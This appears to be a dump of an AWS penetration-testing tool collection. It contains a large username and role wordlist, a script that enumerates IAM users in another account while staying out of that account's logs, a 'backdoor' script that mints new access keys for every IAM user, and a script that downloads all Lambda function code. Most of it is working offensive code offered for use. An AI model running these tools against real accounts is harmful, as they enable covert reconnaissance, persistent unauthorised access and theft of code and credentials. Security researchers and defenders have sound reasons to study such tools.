mongodb 925 | monitor 926 | monitoring 927 | monroe 928 | mq 929 | mtsecurityscan 930 | myMMSRole 931 | myRole 932 | mymmsrole 933 | myrole 934 | n 935 | natacha 936 | neida 937 | neil 938 | neptune 939 | netadmin 940 | netadministrator 941 | networkadmin 942 | networkadministrator 943 | nevada 944 | newrelic 945 | newrelic-infrastructure-aws-integration 946 | ngoc 947 | nobuko 948 | norris 949 | numbers 950 | nyla 951 | o 952 | odis 953 | okta 954 | oktasso 955 | onie 956 | opsclarity 957 | opsclarity-access 958 | opsworks 959 | orbitera 960 | orville 961 | p 962 | palmer 963 | parker 964 | penetrationtest 965 | penetrationtester 966 | pentest 967 | percy 968 | phil 969 | pierre 970 | pinpoint 971 | polly 972 | porsche 973 | porsha 974 | poweruser 975 | pusher 976 | q 977 | quicksight 978 | r 979 | raeann 980 | ramona 981 | rancher 982 | randal 983 | randy 984 | rds 985 | readonly 986 | redline 987 | redline13 988 | redlineaccess 989 | redshift 990 | reggie 991 | regina 992 | reina 993 | rekognition 994 | renee 995 | reta 996 | rhona 997 | richard 998 | rickey 999 | rico 1000 | rigoberto 1001 | robbie 1002 | robbin 1003 | rocky 1004 | roger 1005 | role 1006 | roleWatch 1007 | rolewatch 1008 | root 1009 | rootRole 1010 | rootrole 1011 | rosalind 1012 | rosio 1013 | route53 1014 | royce 1015 | ruben 1016 | rueben 1017 | s 1018 | s3 1019 | s3stat 1020 | sa 1021 | sagemaker 1022 | salvador 1023 | sammy 1024 | scarlett 1025 | scheduler 1026 | secaudit 1027 | secretsmanager 1028 | securityaudit 1029 | see 1030 | server 1031 | service 1032 | ses 1033 | seth 1034 | shakira 1035 | shannon 1036 | shaquana 1037 | shara 1038 | shared 1039 | shelia 1040 | shelley 1041 | sherryl 1042 | shield 1043 | shon 1044 | sidney 1045 | signalfx 1046 | silas 1047 | simpleemailservice 1048 | singlesign-on 1049 | singlesignon 1050 | skeddly 1051 | sms 1052 | snowball 1053 | sns 1054 | son 1055 | song 1056 | soraya 1057 | spark 1058 | sqs 1059 | sso 1060 | stackdriver 1061 | stepfunctions 1062 | storage 1063 | storagegateway 1064 | sumerian 1065 | support 1066 | swf 1067 | sylvester 1068 | synthia 1069 | syreeta 1070 | sysadmin 1071 | sysadministrator 1072 | systemadmin 1073 | systemadministrator 1074 | systemsmanager 1075 | t 1076 | tanja 1077 | task 1078 | taskscheduler 1079 | temp 1080 | temporary 1081 | teodoro 1082 | teraproc 1083 | teraproc-access 1084 | terrilyn 1085 | test 1086 | testing 1087 | thomasine 1088 | threatstack 1089 | threatstackrole 1090 | tia 1091 | tiana 1092 | timer 1093 | tommie 1094 | tonisha 1095 | tory 1096 | transcribe 1097 | translate 1098 | tresa 1099 | trinidad 1100 | truman 1101 | trustedadvisor 1102 | tyisha 1103 | u 1104 | ulysses 1105 | uploader 1106 | ursula 1107 | user 1108 | v 1109 | valentine 1110 | verona 1111 | vmimport 1112 | vpc 1113 | vpc_nat 1114 | vpn 1115 | w 1116 | waf 1117 | walter 1118 | waltraud 1119 | waylon 1120 | werner 1121 | wilma 1122 | wilmer 1123 | workdocs 1124 | workmail 1125 | workspaces 1126 | workspaces_DefaultRole 1127 | workspaces_defaultrole 1128 | x 1129 | x-ray 1130 | xray 1131 | y 1132 | yahaira 1133 | yer 1134 | yolanda 1135 | z 1136 | zandra -------------------------------------------------------------------------------- /iam/iam_user_enum/default-word-list.txt: -------------------------------------------------------------------------------- 1 | 0 2 | 1 3 | 2 4 | 3 5 | 4 6 | 5 7 | 6 8 | 7 9 | 8 10 | 9 11 | A 12 | ADS 13 | API 14 | APIGateway 15 | AWS 16 | Aaron 17 | Abram 18 | Account 19 | Adelia 20 | Adell 21 | Admin 22 | Administrator 23 | Agustin 24 | Ai 25 | Alert_Logic_Cloud_Defender 26 | Alexa 27 | AlexaForBusiness 28 | Alfonzo 29 | Ali 30 | Alica 31 | Alisia 32 | Allan 33 | Almeda 34 | Alpha 35 | Alvera 36 | Amado 37 | AmazonRedShift 38 | Amberly 39 | Amos 40 | Analytics 41 | Anderson 42 | Anette 43 | Angele 44 | Angie 45 | Annalisa 46 | Anne 47 | Annice 48 | Antonetta 49 | Antonia 50 | Antwan 51 | AppStream2 52 | AppStream2.0 53 | AppSync 54 | Argelia 55 | Argentina 56 | Arnoldo 57 | Artifact 58 | Arvilla 59 | Athena 60 | Audit 61 | AutoScaling 62 | Avery 63 | Ayanna 64 | B 65 | Bari 66 | Bastion 67 | Batch 68 | Benton 69 | Bethel 70 | Billing 71 | Bobette 72 | Brandie 73 | Brenton 74 | Bret 75 | Britt 76 | Bruce 77 | Bryan 78 | Bryant 79 | Brynn 80 | Buddy 81 | C 82 | CF 83 | CLI 84 | Caitlin 85 | Caleb 86 | Carlotta 87 | CertificateManager 88 | Chauncey 89 | Cheri 90 | Chery 91 | Chime 92 | Chris 93 | Cicely 94 | Clark 95 | Cloud9 96 | CloudCheckr 97 | CloudFormation 98 | CloudFront 99 | CloudHSM 100 | CloudMGR 101 | CloudSearch 102 | CloudSploitRole 103 | CloudTrail 104 | CloudWatch 105 | CodeBuild 106 | CodeCommit 107 | CodeDeploy 108 | CodePipeline 109 | CodeStar 110 | Cognito 111 | Coleman 112 | Comprehend 113 | Config 114 | Configuration 115 | Connect 116 | Cordell 117 | Coretta 118 | Corrine 119 | Curt 120 | Curtis 121 | D 122 | DB 123 | DBAdmin 124 | DMS 125 | DS 126 | DSWebAppsScanningRole 127 | Dane 128 | Darnell 129 | Darrel 130 | Darrin 131 | DataPipeline 132 | DataScientist 133 | DatabaseAdministrator 134 | DatadogAWSIntegrationRole 135 | Db 136 | Debrah 137 | DeepLens 138 | Deetta 139 | Default 140 | Delores 141 | Deloris 142 | Demarcus 143 | Demo 144 | Dena 145 | Denice 146 | Denita 147 | Dennis 148 | Derick 149 | Desirae 150 | Dev 151 | Developer 152 | DeviceFarm 153 | Dewey 154 | Dick 155 | Dino 156 | DirectConnect 157 | DirectoryService 158 | Dirk 159 | Docker 160 | Dome9-Connect 161 | Dome9Connect 162 | Domenic 163 | Dominique 164 | Donn 165 | Dyan 166 | DynamoDB 167 | E 168 | EBS 169 | EC2 170 | ECS 171 | EFS 172 | EKS 173 | EMR 174 | EMR-Test 175 | EMR-test 176 | EMR_Test 177 | EMR_test 178 | Eboni 179 | Echo 180 | Eddie 181 | ElastiCache 182 | ElasticTranscoder 183 | ElasticsearchService 184 | Elia 185 | Elisabeth 186 | Elsy 187 | Emelda 188 | Emely 189 | Encryption 190 | Erick 191 | Ervin 192 | Ester 193 | Eugenia 194 | Eugenie 195 | External 196 | F 197 | Fabian 198 | Fallon 199 | Faye 200 | Felton 201 | Fernando 202 | Fidel 203 | Floyd 204 | Frankie 205 | FreeRTOS 206 | G 207 | Gala 208 | GameLift 209 | Gene 210 | Georgie 211 | Gertha 212 | Gertie 213 | Gia 214 | Giuseppe 215 | Glacier 216 | Global 217 | GlobalLog 218 | Glue 219 | Graham 220 | Greengrass 221 | Gregg 222 | GuardDuty 223 | H 224 | Hacker 225 | Haywood 226 | Hedwig 227 | Hilario 228 | Hilda 229 | Hoyt 230 | I 231 | IAM 232 | IT 233 | Ian 234 | Ina 235 | Inspector 236 | Intern 237 | IoT1-Click 238 | IoT1Click 239 | IoTAnalytics 240 | IoTCore 241 | IoTDeviceDefender 242 | IoTDeviceManagement 243 | J 244 | Jacinto 245 | Jackson 246 | Jacque 247 | Jade 248 | Jammie 249 | Janita 250 | Jc 251 | Jeanetta 252 | Jenine 253 | Jeremiah 254 | Jewel 255 | Joan 256 | Joanie 257 | Jodie 258 | Joesph 259 | Josue 260 | Judson 261 | Julee 262 | Juliette 263 | K 264 | K8s 265 | KVS 266 | Kaci 267 | Karine 268 | Katy 269 | Keith 270 | Kenna 271 | Kermit 272 | Kiana 273 | Kimiko 274 | Kinesis 275 | KinesisVideoStreams 276 | Kirby 277 | KochavaReadS3 278 | Kops 279 | Korey 280 | Kristian 281 | Kube 282 | KubernetesNode 283 | L 284 | Lacey 285 | Lady 286 | Lakiesha 287 | Lambda 288 | Lang 289 | Lanny 290 | Lashandra 291 | Lauren 292 | Leatrice 293 | Lenard 294 | Leona 295 | Les 296 | Lex 297 | Lightsail 298 | Lillian 299 | Linh 300 | Linnie 301 | Logger 302 | Logging 303 | Loggly_aws 304 | Logs 305 | Loni 306 | Lucie 307 | Lucius 308 | Luke 309 | M 310 | ML 311 | MQ 312 | MachineLearning 313 | Macie 314 | Madeline 315 | Malisa 316 | Marcell 317 | Marcos 318 | Margery 319 | Margrett 320 | Maria 321 | Maribel 322 | Marin 323 | Marlon 324 | Marshall 325 | Maryanna 326 | Marylou 327 | Master 328 | Mathilda 329 | Matthew 330 | Mauricio 331 | Mauro 332 | Maximo 333 | MediaConvert 334 | MediaLive 335 | MediaPackage 336 | MediaStore 337 | MediaTailor 338 | Mee 339 | Melania 340 | Melany 341 | Melody 342 | Meridith 343 | Mesos 344 | Michale 345 | Micheal 346 | Michell 347 | Mickie 348 | MigrationHub 349 | Mikel 350 | Milford 351 | Miquel 352 | Mirna 353 | Misc 354 | Miscellaneous 355 | MobileAnalytics 356 | MobileHub 357 | Mohamed 358 | Molly 359 | Monitor 360 | Monitoring 361 | Monroe 362 | MtSecurityScan 363 | MyRole 364 | N 365 | Natacha 366 | Neida 367 | Neil 368 | Neptune 369 | NetAdmin 370 | NetAdministrator 371 | NetworkAdmin 372 | NetworkAdministrator 373 | Nevada 374 | NewRelic-Infrastructure-AWS-Integration 375 | Ngoc 376 | Nobuko 377 | Norris 378 | Numbers 379 | Nyla 380 | O 381 | Odis 382 | OktaSSO 383 | Onie 384 | OpsClarity-Access 385 | OpsWorks 386 | Orbitera 387 | Orville 388 | P 389 | Palmer 390 | Parker 391 | PenTest 392 | PenetrationTest 393 | PenetrationTester 394 | Pentest 395 | Percy 396 | Phil 397 | Pierre 398 | Pinpoint 399 | Polly 400 | Porsche 401 | Porsha 402 | PowerUser 403 | Poweruser 404 | Pusher 405 | Q 406 | QuickSight 407 | R 408 | RDS 409 | Raeann 410 | Ramona 411 | Rancher 412 | Randal 413 | Randy 414 | ReadOnly 415 | Readonly 416 | RedShift 417 | RedlineAccess 418 | Reggie 419 | Regina 420 | Reina 421 | Rekognition 422 | Renee 423 | Reta 424 | Rhona 425 | Richard 426 | Rickey 427 | Rico 428 | Rigoberto 429 | Robbie 430 | Robbin 431 | Rocky 432 | Roger 433 | Role 434 | Root 435 | RootRole 436 | Rosalind 437 | Rosio 438 | Route53 439 | Royce 440 | Ruben 441 | Rueben 442 | S 443 | S3 444 | SES 445 | SMS 446 | SNS 447 | SQS 448 | SSO 449 | SWF 450 | SageMaker 451 | Salvador 452 | Sammy 453 | Scarlett 454 | Scheduler 455 | SecAudit 456 | SecretsManager 457 | SecurityAudit 458 | See 459 | Server 460 | Service 461 | Seth 462 | Shakira 463 | Shannon 464 | Shaquana 465 | Shara 466 | Shared 467 | Shelia 468 | Shelley 469 | Sherryl 470 | Shield 471 | Shon 472 | Sidney 473 | Silas 474 | SimpleEmailService 475 | SingleSign-On 476 | SingleSignOn 477 | Snowball 478 | Son 479 | Song 480 | Soraya 481 | Spark 482 | Stackdriver 483 | StepFunctions 484 | Storage 485 | StorageGateway 486 | Sumerian 487 | Support 488 | Sylvester 489 | Synthia 490 | Syreeta 491 | SysAdmin 492 | SysAdministrator 493 | SystemAdmin 494 | SystemAdministrator 495 | SystemsManager 496 | T 497 | Tanja 498 | Task 499 | TaskScheduler 500 | Temp 501 | Temporary 502 | Teodoro 503 | Terrilyn 504 | Test 505 | Testing 506 | Thomasine 507 | ThreatStackRole 508 | Tia 509 | Tiana 510 | Timer 511 | Tommie 512 | Tonisha 513 | Tory 514 | Transcribe 515 | Translate 516 | Tresa 517 | Trinidad 518 | Truman 519 | TrustedAdvisor 520 | Tyisha 521 | U 522 | Ulysses 523 | Uploader 524 | Ursula 525 | User 526 | V 527 | VPC 528 | VPC_NAT 529 | VPN 530 | Valentine 531 | Verona 532 | W 533 | WAF 534 | Walter 535 | Waltraud 536 | Waylon 537 | Werner 538 | Wilma 539 | Wilmer 540 | WorkDocs 541 | WorkMail 542 | WorkSpaces 543 | X 544 | X-Ray 545 | XRay 546 | Y 547 | Yahaira 548 | Yer 549 | Yolanda 550 | Z 551 | Zandra 552 | a 553 | aaron 554 | abram 555 | account 556 | adelia 557 | adell 558 | adm 559 | admin 560 | administrator 561 | ads 562 | agustin 563 | ai 564 | alert_logic_cloud_defender 565 | alertlogic 566 | alexa 567 | alexaforbusiness 568 | alfonzo 569 | ali 570 | alica 571 | alisia 572 | allan 573 | almeda 574 | alpha 575 | alvera 576 | amado 577 | amazonredshift 578 | amberly 579 | amos 580 | analytics 581 | anderson 582 | anette 583 | angele 584 | angie 585 | annalisa 586 | anne 587 | annice 588 | antonetta 589 | antonia 590 | antwan 591 | api 592 | apigateway 593 | appstream2 594 | appstream2.0 595 | appsync 596 | argelia 597 | argentina 598 | arnoldo 599 | artifact 600 | arvilla 601 | athena 602 | audit 603 | autoscaling 604 | avery 605 | aws 606 | ayanna 607 | b 608 | bari 609 | bastion 610 | batch 611 | benton 612 | bethel 613 | billing 614 | bobette 615 | bp-cloudhealth 616 | brandie 617 | brenton 618 | bret 619 | britt 620 | bruce 621 | bryan 622 | bryant 623 | brynn 624 | buddy 625 | bulletproof 626 | c 627 | caitlin 628 | caleb 629 | carlotta 630 | cb-access 631 | certificatemanager 632 | cf 633 | chauncey 634 | cheri 635 | chery 636 | chime 637 | chris 638 | cicely 639 | clark 640 | cli 641 | cloud9 642 | cloudability 643 | cloudbreak 644 | cloudcheckr 645 | cloudcraft 646 | cloudformation 647 | cloudfront 648 | cloudhsm 649 | cloudmgr 650 | cloudsearch 651 | cloudsploit 652 | cloudsploitrole 653 | cloudtrail 654 | cloudwatch 655 | codebuild 656 | codecommit 657 | codedeploy 658 | codepipeline 659 | codestar 660 | cognito 661 | coleman 662 | comprehend 663 | config 664 | configuration 665 | connect 666 | cordell 667 | coretta 668 | corrine 669 | curt 670 | curtis 671 | d 672 | dane 673 | darnell 674 | darrel 675 | darrin 676 | databaseadministrator 677 | datadog 678 | datadogawsintegrationrole 679 | datapipeline 680 | datascientist 681 | db 682 | dbadmin 683 | debrah 684 | deeplens 685 | deepsecurity 686 | deetta 687 | default 688 | delores 689 | deloris 690 | demarcus 691 | demo 692 | dena 693 | denice 694 | denita 695 | dennis 696 | derick 697 | desirae 698 | dev 699 | developer 700 | devicefarm 701 | dewey 702 | dick 703 | dino 704 | directconnect 705 | directoryservice 706 | dirk 707 | dms 708 | docker 709 | dome9 710 | dome9-connect 711 | dome9connect 712 | domenic 713 | dominique 714 | donn 715 | ds 716 | dswebappsscanningrole 717 | dyan 718 | dynamodb 719 | dynatrace 720 | e 721 | eboni 722 | ebs 723 | ec2 724 | echo 725 | ecs 726 | eddie 727 | efs 728 | eks 729 | elasticache 730 | elasticsearchservice 731 | elastictranscoder 732 | elia 733 | elisabeth 734 | elsy 735 | emelda 736 | emely 737 | emr 738 | emr-test 739 | emr_test 740 | encryption 741 | erick 742 | ervin 743 | ester 744 | eugenia 745 | eugenie 746 | external 747 | f 748 | fabian 749 | fallon 750 | faye 751 | felton 752 | fernando 753 | fidel 754 | flowlogsRole 755 | flowlogsrole 756 | floyd 757 | frankie 758 | freertos 759 | freshservice 760 | g 761 | gala 762 | gamelift 763 | gene 764 | georgie 765 | gertha 766 | gertie 767 | gia 768 | giuseppe 769 | glacier 770 | global 771 | globallog 772 | globus 773 | glue 774 | graham 775 | greengrass 776 | gregg 777 | guardduty 778 | h 779 | hacker 780 | haywood 781 | hedwig 782 | hilario 783 | hilda 784 | hoyt 785 | i 786 | iam 787 | ian 788 | ina 789 | inspector 790 | instaclustr 791 | intern 792 | iot1-click 793 | iot1click 794 | iotanalytics 795 | iotcore 796 | iotdevicedefender 797 | iotdevicemanagement 798 | it 799 | j 800 | jacinto 801 | jackson 802 | jacque 803 | jade 804 | jammie 805 | janita 806 | jc 807 | jeanetta 808 | jenine 809 | jeremiah 810 | jewel 811 | joan 812 | joanie 813 | jodie 814 | joesph 815 | josue 816 | judson 817 | julee 818 | juliette 819 | k 820 | k8s 821 | kaci 822 | karine 823 | katy 824 | keith 825 | kenna 826 | kermit 827 | keyWatch 828 | keywatch 829 | kiana 830 | kimiko 831 | kinesis 832 | kinesisvideostreams 833 | kirby 834 | kochava 835 | kochavareads3 836 | kops 837 | korey 838 | kristian 839 | kube 840 | kubernetes 841 | kubernetesnode 842 | kvs 843 | l 844 | lacey 845 | lady 846 | lakiesha 847 | lambda 848 | lang 849 | lanny 850 | lashandra 851 | lauren 852 | leatrice 853 | lenard 854 | leona 855 | les 856 | lex 857 | lightsail 858 | lillian 859 | linh 860 | linnie 861 | logger 862 | logging 863 | loggly 864 | loggly-role 865 | loggly_aws 866 | logs 867 | loni 868 | lucie 869 | lucius 870 | luke 871 | m 872 | machinelearning 873 | macie 874 | madeline 875 | malisa 876 | manage 877 | management 878 | management-admin 879 | marcell 880 | marcos 881 | margery 882 | margrett 883 | maria 884 | maribel 885 | marin 886 | marlon 887 | marshall 888 | maryanna 889 | marylou 890 | master 891 | mathilda 892 | matthew 893 | mauricio 894 | mauro 895 | maximo 896 | mediaconvert 897 | medialive 898 | mediapackage 899 | mediastore 900 | mediatailor 901 | mediatemple 902 | mee 903 | melania 904 | melany 905 | melody 906 | meridith 907 | mesos 908 | michale 909 | micheal 910 | michell 911 | mickie 912 | migrationhub 913 | mikel 914 | milford 915 | miquel 916 | mirna 917 | misc 918 | miscellaneous 919 | ml 920 | mobileanalytics 921 | mobilehub 922 | mohamed 923 | molly 924 | mongodb 925 | monitor 926 | monitoring 927 | monroe 928 | mq 929 | mtsecurityscan 930 | myMMSRole 931 | myRole 932 | mymmsrole 933 | myrole 934 | n 935 | natacha 936 | neida 937 | neil 938 | neptune 939 | netadmin 940 | netadministrator 941 | networkadmin 942 | networkadministrator 943 | nevada 944 | newrelic 945 | newrelic-infrastructure-aws-integration 946 | ngoc 947 | nobuko 948 | norris 949 | numbers 950 | nyla 951 | o 952 | odis 953 | okta 954 | oktasso 955 | onie 956 | opsclarity 957 | opsclarity-access 958 | opsworks 959 | orbitera 960 | orville 961 | p 962 | palmer 963 | parker 964 | penetrationtest 965 | penetrationtester 966 | pentest 967 | percy 968 | phil 969 | pierre 970 | pinpoint 971 | polly 972 | porsche 973 | porsha 974 | poweruser 975 | pusher 976 | q 977 | quicksight 978 | r 979 | raeann 980 | ramona 981 | rancher 982 | randal 983 | randy 984 | rds 985 | readonly 986 | redline 987 | redline13 988 | redlineaccess 989 | redshift 990 | reggie 991 | regina 992 | reina 993 | rekognition 994 | renee 995 | reta 996 | rhona 997 | richard 998 | rickey 999 | rico 1000 | rigoberto 1001 | robbie 1002 | robbin 1003 | rocky 1004 | roger 1005 | role 1006 | roleWatch 1007 | rolewatch 1008 | root 1009 | rootRole 1010 | rootrole 1011 | rosalind 1012 | rosio 1013 | route53 1014 | royce 1015 | ruben 1016 | rueben 1017 | s 1018 | s3 1019 | s3stat 1020 | sa 1021 | sagemaker 1022 | salvador 1023 | sammy 1024 | scarlett 1025 | scheduler 1026 | secaudit 1027 | secretsmanager 1028 | securityaudit 1029 | see 1030 | server 1031 | service 1032 | ses 1033 | seth 1034 | shakira 1035 | shannon 1036 | shaquana 1037 | shara 1038 | shared 1039 | shelia 1040 | shelley 1041 | sherryl 1042 | shield 1043 | shon 1044 | sidney 1045 | signalfx 1046 | silas 1047 | simpleemailservice 1048 | singlesign-on 1049 | singlesignon 1050 | skeddly 1051 | sms 1052 | snowball 1053 | sns 1054 | son 1055 | song 1056 | soraya 1057 | spark 1058 | sqs 1059 | sso 1060 | stackdriver 1061 | stepfunctions 1062 | storage 1063 | storagegateway 1064 | sumerian 1065 | support 1066 | swf 1067 | sylvester 1068 | synthia 1069 | syreeta 1070 | sysadmin 1071 | sysadministrator 1072 | systemadmin 1073 | systemadministrator 1074 | systemsmanager 1075 | t 1076 | tanja 1077 | task 1078 | taskscheduler 1079 | temp 1080 | temporary 1081 | teodoro 1082 | teraproc 1083 | teraproc-access 1084 | terrilyn 1085 | test 1086 | testing 1087 | thomasine 1088 | threatstack 1089 | threatstackrole 1090 | tia 1091 | tiana 1092 | timer 1093 | tommie 1094 | tonisha 1095 | tory 1096 | transcribe 1097 | translate 1098 | tresa 1099 | trinidad 1100 | truman 1101 | trustedadvisor 1102 | tyisha 1103 | u 1104 | ulysses 1105 | uploader 1106 | ursula 1107 | user 1108 | v 1109 | valentine 1110 | verona 1111 | vmimport 1112 | vpc 1113 | vpc_nat 1114 | vpn 1115 | w 1116 | waf 1117 | walter 1118 | waltraud 1119 | waylon 1120 | werner 1121 | wilma 1122 | wilmer 1123 | workdocs 1124 | workmail 1125 | workspaces 1126 | workspaces_DefaultRole 1127 | workspaces_defaultrole 1128 | x 1129 | x-ray 1130 | xray 1131 | y 1132 | yahaira 1133 | yer 1134 | yolanda 1135 | z 1136 | zandra -------------------------------------------------------------------------------- /iam/iam_user_enum/iam_user_enum.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # iam_user_enum.py by Spencer Gietzen of Rhino Security Labs 4 | # https://github.com/RhinoSecurityLabs/ 5 | # https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/iam_user_enum 6 | 7 | import argparse 8 | import boto3 9 | import botocore 10 | import sys 11 | 12 | def main(args): 13 | attempts = 0 14 | valid_users = [] 15 | 16 | if args.profile == None: 17 | session = boto3.session.Session() 18 | print('No AWS CLI profile passed in, choose one below or re=run the script using the -p/--profile argument:') 19 | profiles = session.available_profiles 20 | for i in range(0, len(profiles)): 21 | print('[{}] {}'.format(i, profiles[i])) 22 | profile_number = int(input('Choose a profile (Ctrl+C to exit): ').strip()) 23 | session = boto3.session.Session(profile_name=profiles[profile_number]) 24 | else: 25 | try: 26 | session = boto3.session.Session(profile_name=args.profile) 27 | except botocore.exceptions.ProfileNotFound as error: 28 | print('Did not find the specified AWS CLI profile: {}\n'.format(args.profile)) 29 | 30 | session = boto3.session.Session() 31 | print('Profiles that are available: {}\n'.format(session.available_profiles)) 32 | print('Quitting...\n') 33 | sys.exit(1) 34 | 35 | client = session.client('iam') 36 | 37 | if args.self_check: 38 | users = [] 39 | with_mfa = 0 40 | without_mfa = 0 41 | print('\nSkipping cross-account enumeration. Checking the current account...\n') 42 | response = client.list_users() 43 | users.extend(response['Users']) 44 | 45 | while 'IsTruncated' in response and response['IsTruncated'] is True: 46 | response = client.list_users( 47 | Marker=response['Marker'] 48 | ) 49 | users.extend(response['Users']) 50 | 51 | print('Found {} users.\n'.format(len(users))) 52 | print('Has MFA?\n') 53 | 54 | for user in users: 55 | mfa = False 56 | response = client.list_mfa_devices( 57 | UserName=user['UserName'] 58 | ) 59 | if 'MFADevices' in response and response['MFADevices']: 60 | if response['MFADevices'][0]['UserName'] == user['UserName']: 61 | with_mfa += 1 62 | print(' {}: Yes'.format(user['UserName'])) 63 | continue 64 | without_mfa += 1 65 | print(' {}: NO!'.format(user['UserName'])) 66 | 67 | print('\nNumber of users with MFA: {}'.format(with_mfa)) 68 | print('Number of users without MFA: {}\n'.format(without_mfa)) 69 | return True 70 | 71 | if args.word_list is None: 72 | word_list_path = './default-word-list.txt' 73 | else: 74 | word_list_path = args.word_list.strip() 75 | 76 | with open(word_list_path, 'r') as f: 77 | word_list = f.read().splitlines() 78 | 79 | print('Targeting account ID: {}\n'.format(args.account_id)) 80 | print('Starting user enumeration...\n') 81 | 82 | for word in word_list: 83 | user_arn = 'arn:aws:iam::{}:user/{}'.format(args.account_id, word) 84 | 85 | attempts += 1 86 | 87 | try: 88 | client.update_assume_role_policy( 89 | RoleName=args.role_name, 90 | PolicyDocument='{{"Version":"2012-10-17","Statement":[{{"Effect":"Deny","Principal":{{"AWS":"{}"}},"Action":"sts:AssumeRole"}}]}}'.format(user_arn) 91 | ) 92 | print(' Found user: {}'.format(user_arn)) 93 | valid_users.append(user_arn) 94 | except botocore.exceptions.ClientError as error: 95 | if 'MalformedPolicyDocument' in str(error): 96 | # User doesn't exist, continue on 97 | pass 98 | elif 'NoSuchEntity' in str(error): 99 | print(' Error: You did not pass in a valid role name. An existing role is required for this script.') 100 | sys.exit(1) 101 | else: 102 | print(' Unhandled error: {}'.format(str(error))) 103 | sys.exit(1) 104 | 105 | if len(valid_users) == 0: 106 | print('No users were found.\n') 107 | else: 108 | print('\nFound {} user(s):\n'.format(len(valid_users))) 109 | for user in valid_users: 110 | print(' {}'.format(user)) 111 | 112 | print('\n{} completed after {} guess(es).\n'.format(sys.argv[0], attempts)) 113 | return True 114 | 115 | if __name__ == '__main__': 116 | parser = argparse.ArgumentParser(description='This script takes in a valid AWS account ID and tries to enumerate existing IAM users within that account. It does so by trying to update the AssumeRole policy document of the role that you pass into --role-name. For your safety, it updates the policy with an explicit deny against the AWS account/IAM user, so that no security holes are opened in your account during enumeration. NOTE: It is recommended to use personal AWS access keys for this script, as it will spam CloudTrail with "iam:UpdateAssumeRolePolicy" logs. The target account will not see anything in their logs though! The keys used must have the iam:UpdateAssumeRolePolicy permission on the role that you pass into --role-name to be able to identify a valid IAM user.') 117 | 118 | parser.add_argument('-s', '--self-check', required=False, default=False, action='store_true', help='Perform a self check against your own AWS account. This flag will skip the bruteforcing and instead list out all IAM users in your account and whether or not they have MFA enabled. This will give you an idea of potential targets in your account and how vulnerable they are to an attack of this kind.') 119 | parser.add_argument('-p', '--profile', required=False, default=None, help='The AWS CLI profile to use for making API calls. This is usually stored under ~/.aws/credentials. You will be prompted by default.') 120 | parser.add_argument('-w', '--word-list', required=False, default=None, help='File path to a different word list to use. There is a default word list with 1063 words. The word list should contain words, one on each line, to use to try and guess IAM role names. Role names ARE case-sensitive.') 121 | parser.add_argument('-r', '--role-name', required=False, default=None, help='The name of a valid role in the current users account to try and update the AssumeRole policy document for.') 122 | parser.add_argument('-i', '--account-id', required=False, default=None, help='The AWS account ID of the target account (12 numeric characters).') 123 | 124 | args = parser.parse_args() 125 | 126 | if not args.self_check and not args.role_name and not args.account_id: 127 | print('Error: --role-name and --account-id are required if you are not using the --self-check option.\n') 128 | elif not args.self_check and (not len(args.account_id) == 12 or not args.account_id.isdigit()): 129 | print('Error: An AWS account ID is a number of length 12. You supplied: {}\n'.format(args.account_id)) 130 | else: 131 | if not args.self_check: 132 | print('\nWarning: This script does not check if the keys you supplied have the correct permissions. Make sure they are allowed to use iam:UpdateAssumeRolePolicy on the role that you pass into --role-name!\n') 133 | main(args) -------------------------------------------------------------------------------- /lambda/lambda_backdoor.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # From: https://danielgrzelak.com/backdooring-an-aws-account-da007d36f8f9 3 | # This script creates a new AWS Access Key and Secret for all users 4 | import json 5 | import boto3 6 | from botocore.exceptions import ClientError 7 | 8 | 9 | 10 | def main(args): 11 | backdoor_users(get_users()) 12 | 13 | 14 | def get_users(): 15 | client = boto3.client('iam') 16 | response = None 17 | user_names = [] 18 | marker = None 19 | 20 | # By default, only 100 users are returned at a time. 21 | # 'Marker' is used for pagination. 22 | while (response is None or response['IsTruncated']): 23 | # Marker is only accepted if result was truncated. 24 | if marker is None: 25 | response = client.list_users() 26 | else: 27 | response = client.list_users(Marker=marker) 28 | 29 | users = response['Users'] 30 | for user in users: 31 | user_names.append(user['UserName']) 32 | 33 | if response['IsTruncated']: 34 | marker = response['Marker'] 35 | 36 | return user_names 37 | 38 | 39 | def backdoor_users(user_names): 40 | for user_name in user_names: 41 | backdoor_user(user_name) 42 | 43 | 44 | def backdoor_user(user_name): 45 | print(user_name) 46 | client = boto3.client('iam') 47 | try: 48 | response = client.create_access_key(UserName=user_name) 49 | print(" " + response['AccessKey']['AccessKeyId']) 50 | print(" " + response['AccessKey']['SecretAccessKey']) 51 | except ClientError as e: 52 | print(" " + e.response['Error']['Message']) 53 | 54 | 55 | if __name__ == '__main__': 56 | args = None 57 | main(args) -------------------------------------------------------------------------------- /lambda/lambda_dumper.py: -------------------------------------------------------------------------------- 1 | """ 2 | Python 3 3 | Script to dump AWS Lambda functions 4 | pip install boto3 requests 5 | aws configure 6 | 7 | configure your AWS credentials 8 | you should have permission for listing and downloading Lambda functions 9 | """ 10 | import os 11 | import boto3 12 | import requests 13 | import zipfile 14 | import shutil 15 | 16 | 17 | class LambdaDumper: 18 | 19 | def __init__(self, out_dir): 20 | self.out_dir = out_dir 21 | self.client = boto3.client('lambda') 22 | self.funcs = [] 23 | self.arns = [] 24 | 25 | def get_lambda_functions(self): 26 | res = self.client.list_functions( 27 | FunctionVersion='ALL', 28 | MaxItems=1000 29 | ) 30 | self.funcs = [f["FunctionName"] for f in res["Functions"]] 31 | self.arns = [f["FunctionArn"] for f in res["Functions"]] 32 | print('[INFO] Lambda function arns') 33 | for arn in self.arns: 34 | print(arn) 35 | def download_functions(self): 36 | for func in self.funcs: 37 | print(f'[INFO] - Downloading Function: {func}') 38 | response = self.client.get_function( 39 | FunctionName=func, 40 | ) 41 | url = response["Code"]["Location"] 42 | lang = response["Configuration"]["Runtime"] 43 | r = requests.get(url, allow_redirects=True) 44 | path = os.path.join(self.out_dir, f'{func}_{lang}.zip') 45 | open(path, 'wb').write(r.content) 46 | 47 | def unzip_files(self): 48 | for item in os.listdir(self.out_dir): 49 | print(f'[INFO] Unzipping: {item}') 50 | if item.endswith(".zip"): 51 | file_name = os.path.join(self.out_dir, item) 52 | out_func_dir = os.path.join( 53 | self.out_dir, item.replace(".zip", "", -1)) 54 | with zipfile.ZipFile(file_name) as zip_ref: 55 | zip_ref.extractall(out_func_dir) 56 | os.remove(file_name) 57 | 58 | 